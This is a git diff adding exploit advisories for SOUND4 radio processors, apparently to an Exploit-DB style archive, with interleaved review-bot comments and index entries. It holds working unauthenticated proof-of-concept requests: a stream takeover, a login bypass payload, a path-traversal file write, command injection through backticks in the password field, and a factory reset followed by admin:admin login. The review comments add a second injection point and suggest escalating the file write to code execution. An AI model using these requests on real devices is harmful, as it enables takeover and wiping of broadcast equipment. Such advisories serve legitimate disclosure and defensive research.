bar high both in terms of performance +and affordability. Designed to deliver a sound of uncompromising quality, +this tool gives you 2-band processing, a digital stereo generator and an +IMPACT Clipper. + +Desc: The application allows an unauthenticated attacker to disconnect the +current monitoring user from listening/monitoring and takeover the radio +stream on a specific channel. 
+ +------------------------------------------------------------------------ +/var/www/killffmpeg.php: +------------------------ + +01: +------------------------------------------------------------------------ + +Tested on: Apache/2.4.25 (Unix) + OpenSSL/1.0.2k + PHP/7.1.1 + GNU/Linux 5.10.43 (armv7l) + GNU/Linux 4.9.228 (armv7l) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5725 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5725.php + + +26.09.2022 + +-- + + +> curl -sko -nul https://RADIO/killffmpeg.php \ No newline at end of file diff --git a/exploits/windows/local/51171.txt b/exploits/windows/local/51171.txt new file mode 100644 index 000000000..74f65da65 --- /dev/null +++ b/exploits/windows/local/51171.txt 
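Review bot: The PoC `curl -sko -nul https://RADIO/killffmpeg.php` has a flag typo: `-o` takes the next argument as the output file, so this writes the response to a file literally named `-nul` instead of discarding it; the intended form, as used in the companion RCE advisory in this patch, is `curl -sko nul https://RADIO/killffmpeg.php` (or `-o /dev/null` on Unix). The `/var/www/killffmpeg.php` excerpt (`01:`) is empty in this listing, so the claim that the script kills the stream with no session check is not backed by visible code and should be restated with the line that performs the kill. Whether a single unauthenticated GET suffices, or a channel parameter is needed to target 'a specific channel' as the description says, is also not shown.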
@@ -0,0 +1,67 @@ +# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: FM/HD Radio Processing: + Impact/Pulse/First (Version 2: 1.1/2.15) + Impact/Pulse/First (Version 1: 2.1/1.69) + Impact/Pulse Eco 1.16 + Voice Processing: + BigVoice4 1.2 + BigVoice2 1.30 + Web-Audio Streaming: + Stream 1.1/2.4.29 + Watermarking: + WM2 (Kantar Media) 1.11 + +Summary: The SOUND4 IMPACT introduces an innovative process - mono and +stereo parts of the signal are processed separately to obtain perfect +consistency in terms of both sound and level. Therefore, in moving +reception, when the FM receiver switches from stereo to mono and back to +stereo, the sound variations and changes in level are reduced by over 90%. +In the SOUND4 IMPACT processing chain, the stereo expander can be used +substantially without any limitations. + +With its advanced functionalities and impressive versatility, SOUND4 +PULSE gives clients the ultimate price - performance ratio, providing +much more than just a processor. Flexible and powerful, it ensures perfect +sound quality and full compatibility with radio broadcasting standards +and can be used simultaneously for FM and HD, DAB, DRM or streaming. + +SOUND4 FIRST provides all the most important functionalities you need +in an FM/HD processor and sets the bar high both in terms of performance +and affordability. Designed to deliver a sound of uncompromising quality, +this tool gives you 2-band processing, a digital stereo generator and an +IMPACT Clipper. + +Desc: The application suffers from an SQL Injection vulnerability. Input +passed through the 'password' POST parameter in 'index.php' is not properly +sanitised before being returned to the user or used in SQL queries. This +can be exploited to manipulate SQL queries by injecting arbitrary SQL code +and bypass the authentication mechanism. 
+ +Tested on: Apache/2.4.25 (Unix) + OpenSSL/1.0.2k + PHP/7.1.1 + GNU/Linux 5.10.43 (armv7l) + GNU/Linux 4.9.228 (armv7l) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5726 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5726.php + + +26.09.2022 + +-- + + +POST /index.php HTTP/1.1 + +username=t00t&password='+joxy--+z \ No newline at end of file diff --git a/exploits/windows/local/51172.txt b/exploits/windows/local/51172.txt new file mode 100644 index 000000000..7aacc6c6f --- /dev/null +++ b/exploits/windows/local/51172.txt 
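Review bot: The description attributes the bypass to SQL injection in the `password` field, but the companion RCE advisory in this same patch (ZSL-2022-5738) shows `login.php` handing `$_POST['password']` straight to `exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ...')` — a shell pipeline, with no SQL query visible. The payload `'+joxy--+z` (an unbalanced single quote followed by `--`) therefore most likely breaks the shell command or the `_check_pwd_` argument handling rather than a query, and the root cause should be restated from the actual code path. The hunk should also show the response (session cookie or redirect) that proves the login succeeded, and the line-12 comment in that excerpt, 'only admin/admin as valid user/password', suggests a hardcoded credential worth calling out separately.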
@@ -0,0 +1,80 @@ +# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: FM/HD Radio Processing: + Impact/Pulse/First (Version 2: 1.1/2.15) + Impact/Pulse/First (Version 1: 2.1/1.69) + Impact/Pulse Eco 1.16 + Voice Processing: + BigVoice4 1.2 + BigVoice2 1.30 + Web-Audio Streaming: + Stream 1.1/2.4.29 + Watermarking: + WM2 (Kantar Media) 1.11 + +Summary: The SOUND4 IMPACT introduces an innovative process - mono and +stereo parts of the signal are processed separately to obtain perfect +consistency in terms of both sound and level. Therefore, in moving +reception, when the FM receiver switches from stereo to mono and back to +stereo, the sound variations and changes in level are reduced by over 90%. +In the SOUND4 IMPACT processing chain, the stereo expander can be used +substantially without any limitations. + +With its advanced functionalities and impressive versatility, SOUND4 +PULSE gives clients the ultimate price - performance ratio, providing +much more than just a processor. Flexible and powerful, it ensures perfect +sound quality and full compatibility with radio broadcasting standards +and can be used simultaneously for FM and HD, DAB, DRM or streaming. + +SOUND4 FIRST provides all the most important functionalities you need +in an FM/HD processor and sets the bar high both in terms of performance +and affordability. Designed to deliver a sound of uncompromising quality, +this tool gives you 2-band processing, a digital stereo generator and an +IMPACT Clipper. + +Desc: The application suffers from an unauthenticated directory traversal +file write vulnerability. Input passed through the 'filename' POST parameter +called by the 'upgrade.php' script is not properly verified before being used +to upload .upgbox Firmware files. 
This can be exploited to write to arbitrary +locations on the system via directory traversal attacks. + +Tested on: Apache/2.4.25 (Unix) + OpenSSL/1.0.2k + PHP/7.1.1 + GNU/Linux 5.10.43 (armv7l) + GNU/Linux 4.9.228 (armv7l) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5730 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5730.php + + +26.09.2022 + +-- + + +POST /cgi-bin/upload.cgi HTTP/1.1 +Host: RAAAADIOOO +Content-Type: multipart/form-data; boundary=----zzzzz +User-Agent: TheViewing/05 +Accept-Encoding: gzip, deflate + +------zzzzz +Content-Disposition: form-data; name="upgfile"; filename="../../../../../../../tmp/pwned" +Content-Type: application/octet-stream + +t00t +------zzzzz +Content-Disposition: form-data; name="submit" + +Do it +------zzzzz-- \ No newline at end of file diff --git a/exploits/windows/local/51173.txt b/exploits/windows/local/51173.txt new file mode 100644 index 000000000..660ad0e56 --- /dev/null +++ b/exploits/windows/local/51173.txt 
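Review bot: The description names the `filename` POST parameter of `upgrade.php`, but the PoC posts to `/cgi-bin/upload.cgi` with a multipart field `upgfile` whose `filename="../../../../../../../tmp/pwned"` carries the traversal; the description should name `upload.cgi` as the vulnerable handler (and say whether `upgrade.php` is merely the page that calls it), otherwise a fix could land on the wrong file. Writing `t00t` to `/tmp` proves traversal but not impact: the write runs with the CGI's privileges — `www-data` per the `id` output in the companion RCE advisory — so a more telling PoC would target a file that user can overwrite inside `/var/www/` (turning this into code execution) or state the restriction if it cannot. The fix to recommend is to take only the basename of the uploaded name and reject anything that is not a plain `.upgbox` file.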
@@ -0,0 +1,75 @@ +# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE) +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: FM/HD Radio Processing: + Impact/Pulse/First (Version 2: 1.1/2.15) + Impact/Pulse/First (Version 1: 2.1/1.69) + Impact/Pulse Eco 1.16 + Voice Processing: + BigVoice4 1.2 + BigVoice2 1.30 + Web-Audio Streaming: + Stream 1.1/2.4.29 + Watermarking: + WM2 (Kantar Media) 1.11 + +Summary: The SOUND4 IMPACT introduces an innovative process - mono and +stereo parts of the signal are processed separately to obtain perfect +consistency in terms of both sound and level. Therefore, in moving +reception, when the FM receiver switches from stereo to mono and back to +stereo, the sound variations and changes in level are reduced by over 90%. +In the SOUND4 IMPACT processing chain, the stereo expander can be used +substantially without any limitations. + +With its advanced functionalities and impressive versatility, SOUND4 +PULSE gives clients the ultimate price - performance ratio, providing +much more than just a processor. Flexible and powerful, it ensures perfect +sound quality and full compatibility with radio broadcasting standards +and can be used simultaneously for FM and HD, DAB, DRM or streaming. + +SOUND4 FIRST provides all the most important functionalities you need +in an FM/HD processor and sets the bar high both in terms of performance +and affordability. Designed to deliver a sound of uncompromising quality, +this tool gives you 2-band processing, a digital stereo generator and an +IMPACT Clipper. + +Desc: The application suffers from an unauthenticated OS command injection +vulnerability. This can be exploited to inject and execute arbitrary shell +commands through the 'password' HTTP POST parameter through index.php and +login.php script. 
+ +======================================================================== +/var/www/login.php: +------------------- +09: if (isset($_POST['username']) && isset($_POST['password'])) { +10: +11: $ret = -1; +12: // remarque: Check Password for broken, only admin/admin as valid user/password +13: exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret); +======================================================================== + +Tested on: Apache/2.4.25 (Unix) + OpenSSL/1.0.2k + PHP/7.1.1 + GNU/Linux 5.10.43 (armv7l) + GNU/Linux 4.9.228 (armv7l) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5738 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5738.php + + +26.09.2022 + +-- + + +> curl --fail -XPOST -sko nul https://RADIOGUGU/index.php --data "username=ZSL&password=`id>/var/www/g`" && curl -sk https://RADIOGUGU/g +uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data) \ No newline at end of file diff --git a/exploits/windows/local/51174.txt b/exploits/windows/local/51174.txt new file mode 100644 index 000000000..77479653c --- /dev/null +++ b/exploits/windows/local/51174.txt 
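Review bot: The `exec()` at line 13 of the `login.php` excerpt also interpolates `$_POST['username']`, wrapped only in double quotes, so `$(...)` and backtick substitution in the username are executed too; the description should list both parameters as injection points, not only `password`. The PoC writes the output of `id` to `/var/www/g` and then fetches it, which leaves a readable file on the target — an engagement should remove it afterwards (`rm /var/www/g`) or use an out-of-band channel instead. The `id` output shows the web server running as `www-data` with the `audio` group, which bounds the immediate impact to what that account can reach and is worth stating alongside the factory-reset and upload findings in this patch.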
@@ -0,0 +1,68 @@ +# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: FM/HD Radio Processing: + Impact/Pulse/First (Version 2: 1.1/2.15) + Impact/Pulse/First (Version 1: 2.1/1.69) + Impact/Pulse Eco 1.16 + Voice Processing: + BigVoice4 1.2 + BigVoice2 1.30 + Web-Audio Streaming: + Stream 1.1/2.4.29 + Watermarking: + WM2 (Kantar Media) 1.11 + +Summary: The SOUND4 IMPACT introduces an innovative process - mono and +stereo parts of the signal are processed separately to obtain perfect +consistency in terms of both sound and level. Therefore, in moving +reception, when the FM receiver switches from stereo to mono and back to +stereo, the sound variations and changes in level are reduced by over 90%. +In the SOUND4 IMPACT processing chain, the stereo expander can be used +substantially without any limitations. + +With its advanced functionalities and impressive versatility, SOUND4 +PULSE gives clients the ultimate price - performance ratio, providing +much more than just a processor. Flexible and powerful, it ensures perfect +sound quality and full compatibility with radio broadcasting standards +and can be used simultaneously for FM and HD, DAB, DRM or streaming. + +SOUND4 FIRST provides all the most important functionalities you need +in an FM/HD processor and sets the bar high both in terms of performance +and affordability. Designed to deliver a sound of uncompromising quality, +this tool gives you 2-band processing, a digital stereo generator and an +IMPACT Clipper. + +Desc: The device allows unauthenticated attackers to visit the unprotected +/usr/cgi-bin/restorefactory.cgi endpoint and reset the device to its factory +default configuration. 
Once a POST request is made, the device will reboot +with its default settings allowing the attacker to bypass authentication +and take full control of the system. + +Tested on: Apache/2.4.25 (Unix) + OpenSSL/1.0.2k + PHP/7.1.1 + GNU/Linux 5.10.43 (armv7l) + GNU/Linux 4.9.228 (armv7l) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5742 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5742.php + + +26.09.2022 + +-- + + +> curl -kX POST "https://RADIO/cgi-bin/restorefactory.cgi" --data "0x539" \ +> sleep 120 + +#login admin:admin \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index bad9708e7..185964144 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
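Review bot: The trailing backslash on `curl -kX POST "https://RADIO/cgi-bin/restorefactory.cgi" --data "0x539" \` continues the command onto the next line, so `sleep 120` becomes two extra URL arguments to curl rather than a pause; make it a separate command, e.g. `... --data "0x539"; sleep 120`. The body `0x539` is not explained — say whether the endpoint needs any body at all or whether a plain GET also triggers the reset, since the description says an attacker can simply 'visit' it. Because this wipes the device configuration and reboots it, the advisory should carry an explicit warning to test only on a spare unit or after a backup, and `#login admin:admin` should be spelled out as the factory-default credentials the reset restores.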
@@ -924,6 +924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44098,exploits/asp/webapps/44098.txt,"EPIC MyChart - X-Path Injection",2018-02-16,"Shayan S",webapps,asp,443,2018-02-16,2018-02-28,1,CVE-2016-6272,,,,,
 34864,exploits/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",webapps,asp,443,2014-10-02,2014-10-02,0,CVE-2014-4312;OSVDB-114150;OSVDB-112471;OSVDB-112470;OSVDB-112469;OSVDB-112467;OSVDB-112466;OSVDB-112465;CVE-2014-4311;OSVDB-112464,,,,,
 27844,exploits/asp/webapps/27844.txt,"EPublisherPro 0.9.7 - 'Moreinfo.asp' Cross-Site Scripting",2006-05-09,Dj_Eyes,webapps,asp,,2006-05-09,2013-08-25,1,CVE-2006-2306;OSVDB-25330,,,,,https://www.securityfocus.com/bid/17907/info
+51154,exploits/asp/webapps/51154.txt,"EQ Enterprise management system v2.2.0 - SQL Injection",2023-03-31,TLF,webapps,asp,,2023-03-31,2023-03-31,0,CVE-2022-45297,,,,,
 17375,exploits/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,webapps,asp,,2011-06-09,2011-06-09,1,,,,,,
 7801,exploits/asp/webapps/7801.txt,"eReservations - Authentication Bypass",2009-01-16,ByALBAYX,webapps,asp,,2009-01-15,,1,OSVDB-51456;CVE-2009-0252,,,,,
 11023,exploits/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,webapps,asp,,2010-01-05,,1,OSVDB-61596;CVE-2010-1064,,,,,
@@ -3142,6 +3143,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46733,exploits/hardware/dos/46733.py,"QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service",2019-04-22,"Dino Covotsos",dos,hardware,,2019-04-22,2019-04-22,0,CVE-2019-7181,,,,,
 40985,exploits/hardware/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,dos,hardware,,2017-01-02,2018-02-07,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2017-01-02-at-91824-am.png,,https://www.securityfocus.com/archive/1/539978
 41219,exploits/hardware/dos/41219.txt,"QNAP NVR/NAS Devices - Buffer Overflow (PoC)",2017-02-01,bashis,dos,hardware,,2017-02-01,2022-11-21,0,,,,,,https://github.com/mcw0/PoC/blob/53a2d49c1e4076e8559bb937f790e724fc52ca1d/QNAP%20NVR%20NAS%20Heap%20-%20Stack%20-%20Heap%20Feng%20Shui%20overflow%20and%20%22Heack%20Combo%22%20to%20pwn.txt
+51157,exploits/hardware/dos/51157.py,"qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)",2023-03-31,"Krzysztof Burghardt",dos,hardware,,2023-03-31,2023-03-31,0,CVE-2022-46770,,,,,
 43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa",dos,hardware,,2018-01-23,2018-01-23,0,CVE-2018-5319,,,,,
 11597,exploits/hardware/dos/11597.py,"RCA DCM425 Cable Modem - 'micro_httpd' Denial of Service (PoC)",2010-02-28,ad0nis,dos,hardware,,2010-02-27,,0,CVE-2010-1544;OSVDB-62713,,,,,
 23672,exploits/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Denial of Service",2004-02-09,"Bruno Morisson",dos,hardware,,2004-02-09,2012-12-25,1,CVE-2004-2078;OSVDB-3891,,,,,https://www.securityfocus.com/bid/9618/info
@@ -3302,6 +3304,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9066,exploits/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Configuration Disclosure",2009-07-01,Septemb0x,remote,hardware,,2009-06-30,,1,OSVDB-55548;CVE-2009-2306,,,,,
 32440,exploits/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation / Code Execution (Metasploit)",2014-03-22,Metasploit,remote,hardware,22,2014-03-22,2014-03-22,1,OSVDB-104652,"Metasploit Framework (MSF)",,,,
 50133,exploits/hardware/remote/50133.py,"Aruba Instant 8.7.1.0 - Arbitrary File Modification",2021-07-16,Gr33nh4t,remote,hardware,,2021-07-16,2021-07-16,0,CVE-2021-25155,,,,,
+51155,exploits/hardware/remote/51155.sh,"ASKEY RTF3505VW-N1 - Privilege Escalation",2023-03-31,"Leonardo Nicolas Servalli",remote,hardware,,2023-03-31,2023-03-31,0,,,,,,
 8846,exploits/hardware/remote/8846.txt,"ASMAX AR 804 gu Web Management Console - Arbitrary Command Execution",2009-06-01,Securitum,remote,hardware,,2009-05-31,,1,OSVDB-54895,,,,,
 42726,exploits/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",remote,hardware,,2017-09-15,2017-09-15,0,CVE-2017-6315,,,,,
 36511,exploits/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 - HTML Injection",2012-12-27,"Vulnerability Research Laboratory",remote,hardware,,2012-12-27,2015-03-27,1,,,,,,https://www.securityfocus.com/bid/51301/info
@@ -14336,6 +14339,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28307,exploits/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple SQL Injections",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29090,,,,,https://www.securityfocus.com/bid/19240/info
 28308,exploits/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'members.php?cfg_root' Remote File Inclusion",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3964;OSVDB-29091,,,,,https://www.securityfocus.com/bid/19240/info
 28306,exploits/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'signup.php?site_name' SQL Injection",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29089,,,,,https://www.securityfocus.com/bid/19240/info
+51175,exploits/php/webapps/51175.txt,"Bangresto 1.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,,
 41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,webapps,php,,2017-05-10,2017-05-10,0,,,,,http://www.exploit-db.comBanManager-WebUI-1.5.8.zip,
 17107,exploits/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,webapps,php,,2011-04-03,2011-04-03,1,,,,,,
 9387,exploits/php/webapps/9387.txt,"Banner Exchange Script 1.0 - 'targetid' Blind SQL Injection",2009-08-07,"599eme Man",webapps,php,,2009-08-06,,1,CVE-2009-5003;OSVDB-68191,,,,,
@@ -14743,6 +14747,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28800,exploits/php/webapps/28800.txt,"Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,webapps,php,,2006-10-13,2017-10-13,1,CVE-2006-6592;OSVDB-32431,,,,,https://www.securityfocus.com/bid/20512/info
 12729,exploits/php/webapps/12729.txt,"Blox CMS - SQL Injection",2010-05-24,CoBRa_21,webapps,php,,2010-05-23,,1,,,,,,
 48746,exploits/php/webapps/48746.rb,"Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass",2020-08-17,"Alexandre ZANNI",webapps,php,,2020-08-17,2020-11-13,1,CVE-2019-17240,,,,,
+51160,exploits/php/webapps/51160.txt,"Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)",2023-03-31,"Alperen Ergel",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
 50529,exploits/php/webapps/50529.txt,"Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)",2021-11-17,Vasu,webapps,php,,2021-11-17,2021-11-17,0,CVE-2021-35323,,,,http://www.exploit-db.combludit-3-13-1.zip,
 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,,2020-06-09,2020-06-09,0,CVE-2019-16113,,,,,
 48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,,
@@ -15026,6 +15031,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,,2020-02-24,2020-02-24,0,,,,,,
 33809,exploits/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,webapps,php,,2014-06-18,2014-06-21,1,CVE-2014-4644;OSVDB-108452,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-06-21-at-102309.png,http://www.exploit-db.comsuperlinks-v1.4-2.tgz,
 35578,exploits/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,webapps,php,,2014-12-19,2016-10-24,0,CVE-2014-4644;OSVDB-108452,,,,http://www.exploit-db.comsuperlinks-v1.4-2.tgz,
+51166,exploits/php/webapps/51166.py,"Cacti v1.2.22 - Remote Command Execution (RCE)",2023-03-31,"Riadh Bouchahoua",webapps,php,,2023-03-31,2023-03-31,0,CVE-2022-46169,,,,,
 48159,exploits/php/webapps/48159.rb,"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)",2020-03-02,"Lucas Amorim",webapps,php,,2020-03-02,2020-03-02,0,,,,,,
 7480,exploits/php/webapps/7480.txt,"CadeNix - SQL Injection",2008-12-15,HaCkeR_EgY,webapps,php,,2008-12-14,2017-01-05,1,OSVDB-51063;CVE-2008-5777,,,,,
 3237,exploits/php/webapps/3237.txt,"Cadre PHP Framework - Remote File Inclusion",2007-01-31,y3dips,webapps,php,,2007-01-30,,1,OSVDB-33631;CVE-2007-0677,,,,,
@@ -21712,6 +21718,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3113,exploits/php/webapps/3113.txt,"Jshop Server 1.3 - 'fieldValidation.php' Remote File Inclusion",2007-01-10,irvian,webapps,php,,2007-01-09,2016-11-16,1,OSVDB-33459;CVE-2007-0232,,,,,
 6057,exploits/php/webapps/6057.txt,"jsite 1.0 oe - SQL Injection / Local File Inclusion",2008-07-12,S.W.A.T.,webapps,php,,2008-07-11,2016-12-13,1,OSVDB-47025;CVE-2008-7301;OSVDB-47024;CVE-2008-3193;OSVDB-47023;CVE-2008-3192,,,,,
 11445,exploits/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,webapps,php,,2010-02-13,,1,OSVDB-62329;CVE-2010-0691,,,,,
+51165,exploits/php/webapps/51165.txt,"Judging Management System v1.0 - Authentication Bypass",2023-03-31,"Angelo Pio Amirante",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
+51164,exploits/php/webapps/51164.py,"Judging Management System v1.0 - Remote Code Execution (RCE)",2023-03-31,"Angelo Pio Amirante",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
 3799,exploits/php/webapps/3799.txt,"JulmaCMS 1.4 - 'file.php' Remote File Disclosure",2007-04-25,GoLd_M,webapps,php,,2007-04-24,2016-09-30,1,OSVDB-35387;CVE-2007-2324,,,,http://www.exploit-db.comjulma.zip,
 2628,exploits/php/webapps/2628.pl,"JumbaCMS 0.0.1 - '/includes/functions.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,webapps,php,,2006-10-22,,1,OSVDB-35737;CVE-2006-6635,,,,,
 29544,exploits/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation",2013-11-12,"Sense of Security",webapps,php,,2013-11-25,2013-11-25,0,CVE-2013-6618;OSVDB-92227,,,,,
@@ -28262,6 +28270,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49644,exploits/php/webapps/49644.txt,"rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)",2021-03-15,"Murat ŞEKER",webapps,php,,2021-03-15,2021-03-15,0,,,,,,
 49783,exploits/php/webapps/49783.py,"rconfig 3.9.6 - Arbitrary File Upload",2021-04-21,"Vishwaraj Bhattrai",webapps,php,,2021-04-21,2021-10-28,0,,,,,,
 49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)",2021-03-18,"Murat ŞEKER",webapps,php,,2021-03-18,2021-10-28,0,,,,,,
+51163,exploits/php/webapps/51163.py,"rconfig 3.9.7 - Sql Injection (Authenticated)",2023-03-31,azhen,webapps,php,,2023-03-31,2023-03-31,0,CVE-2022-45030,,,,,
 48207,exploits/php/webapps/48207.py,"rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution",2020-03-12,"Engin Demirbilek",webapps,php,,2020-03-12,2020-03-12,0,CVE-2020-10221,,,,,
 9552,exploits/php/webapps/9552.txt,"Re-Script 0.99 Beta - 'listings.php?op' SQL Injection",2009-08-31,Mr.SQL,webapps,php,,2009-08-30,,1,,,,,,
 11943,exploits/php/webapps/11943.txt,"React software - Local File Inclusion",2010-03-29,SNK,webapps,php,,2010-03-28,,1,,,,,,
@@ -28850,6 +28859,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35701,exploits/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",webapps,php,,2011-05-03,2015-01-05,1,,,,,,https://www.securityfocus.com/bid/47701/info
 34146,exploits/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",webapps,php,,2010-06-15,2014-07-23,1,,,,,,
 48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,,2020-05-13,2020-05-13,0,,,,,,
+51161,exploits/php/webapps/51161.txt,"Senayan Library Management System v9.0.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,,
 51120,exploits/php/webapps/51120.txt,"Senayan Library Management System v9.5.0 - SQL Injection",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 2117,exploits/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,webapps,php,,2006-08-02,2016-08-31,1,OSVDB-27782,,,,http://www.exploit-db.comsendcard_3-4-0.tar.gz,
 3827,exploits/php/webapps/3827.txt,"Sendcard 3.4.1 - 'sendcard.php?form' Local File Inclusion",2007-05-01,ettee,webapps,php,,2007-04-30,2016-09-30,1,OSVDB-35738;CVE-2007-2471,,,,http://www.exploit-db.comsendcard_3-4-1.tar.gz,
@@ -29697,6 +29707,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10408,exploits/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",webapps,php,,2009-12-12,,1,,,,,,
 34321,exploits/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",webapps,php,,2010-07-15,2014-08-12,1,,,,,,https://www.securityfocus.com/bid/41701/info
